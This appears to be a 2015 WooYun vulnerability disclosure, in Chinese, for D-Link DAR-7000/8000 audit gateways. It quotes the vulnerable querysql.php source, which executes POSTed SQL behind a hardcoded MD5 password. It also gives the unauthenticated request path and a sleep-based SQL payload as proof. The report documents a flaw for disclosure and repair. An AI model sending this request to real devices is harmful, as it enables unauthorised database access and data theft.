当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(19) 关注此漏洞

缺陷编号: WooYun-2015-161348

漏洞标题: D-Link某系列产品任意SQL执行(无需登录)

相关厂商: cncert国家互联网应急中心

漏洞作者: menmen519

提交时间: 2015-12-15 09:35

公开时间: 2016-03-10 19:01

漏洞类型: 设计不当

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 设计不当

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-15: 细节已通知厂商并且等待厂商处理中
2015-12-18: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-02-11: 细节向核心白帽子及相关领域专家公开
2016-02-21: 细节向普通白帽子公开
2016-03-02: 细节向实习白帽子公开
2016-03-10: 细节向公众公开

简要描述:

D-Link某系列产品任意sql执行(无需登录)

详细说明:

这里不举例子,参考YY-2012:http://**.**.**.**/bugs/wooyun-2015-0135939



Tool/querysql.php:



code 区域
<?php
include_once('../global.func.php');
session_start();
set_time_limit(0);
//$pass="31cce99a299cf4cfc7f7650939b05eb9";
$pass="3ff5b5f7b808417cd474f7099bee7821";
conn();
$time=0;
$sql="";
if(isset($_POST['pass']))
{
if(md5($_POST['pass'])==$pass)
{
$_SESSION['tool']="on";
}
}
if(isset($_POST['txt']))
{
$sql=stripslashes($_POST['txt']);
echo $sql;
$t1=microtime_float();
$res=mysql_query($sql);
$t2=microtime_float();
if($res)
{
$time=$t2-$t1;
}

}

function microtime_float()
{
list($usec, $sec) = explode(" ", microtime(true));
return ((float)$usec + (float)$sec);
}


?>
<html>
<head>
<title>
执行sql语句
</title>
</head>
<body>

<?php if(!isset($_SESSION['tool'])||$_SESSION['tool']!="on"){?>
<div align="center">
<br>
<fieldset style="width:50%"><br>
<br>
<form id="passfrm" action="?" method="POST">
Password:<input type="password" id="pass" name="pass">
<input type="submit" value="sign in">
</form>
</fieldset>
</div>
<?php }
else
{
?>
<div align="center">
<fieldset style="width:80%">
<div align="center">处理时间<input type="text" id="time" value="<?php echo $time;?>">秒</div>
<table width="80%">
<tr>
<td>
<form id="frm" action="?" method="POST">
<textarea id="txt" name="txt" cols="80" rows="20">
<?php echo $sql;?>
</textarea>
<input type="submit" value="确定">
</form>
</td>
</tr>
</table>
<?php
if($res)
{
$j=1;
while ($data=mysql_fetch_array($res,MYSQL_ASSOC))
{
if($j==1)
{
$keys=array_keys($data);
$str.="<tr>";
foreach ($keys as $v)
{
$str.="<td align='center'><b>$v</b></td>";
}
$str.="</tr>";
}
$str.="<tr>";
foreach ($data as $key=>$value)
{
$str.="<td>$value</td>";
}
$str.="</tr>";
$j++;
}
}
else echo mysql_error();
?>
<table width="95%" border="1">
<?php echo $str;?>
</table>
</fieldset>
</div>
<?php }?>
</body>

</html>







发送url:

**.**.**.**:8443/Tool/querysql.php



postdata:

txt=select 1,2,sleep(5)



延迟五秒钟





这里通过审计是可以执行任意整句sql

漏洞证明:

code 区域
**.**.**.**:8443/home.php      DAR-7000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-7000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关

**.**.**.**:8443/home.php DAR-8000 系列上网行为审计网关

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-12-18 16:46

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

登录后才能发表评论,请先 登录